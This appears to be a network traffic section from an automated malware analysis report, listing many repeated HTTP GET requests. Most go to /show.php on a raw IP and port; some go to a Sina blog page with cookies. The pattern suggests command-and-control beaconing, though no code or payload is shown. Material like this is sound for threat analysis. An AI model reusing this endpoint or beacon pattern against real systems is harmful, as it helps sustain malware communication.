Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
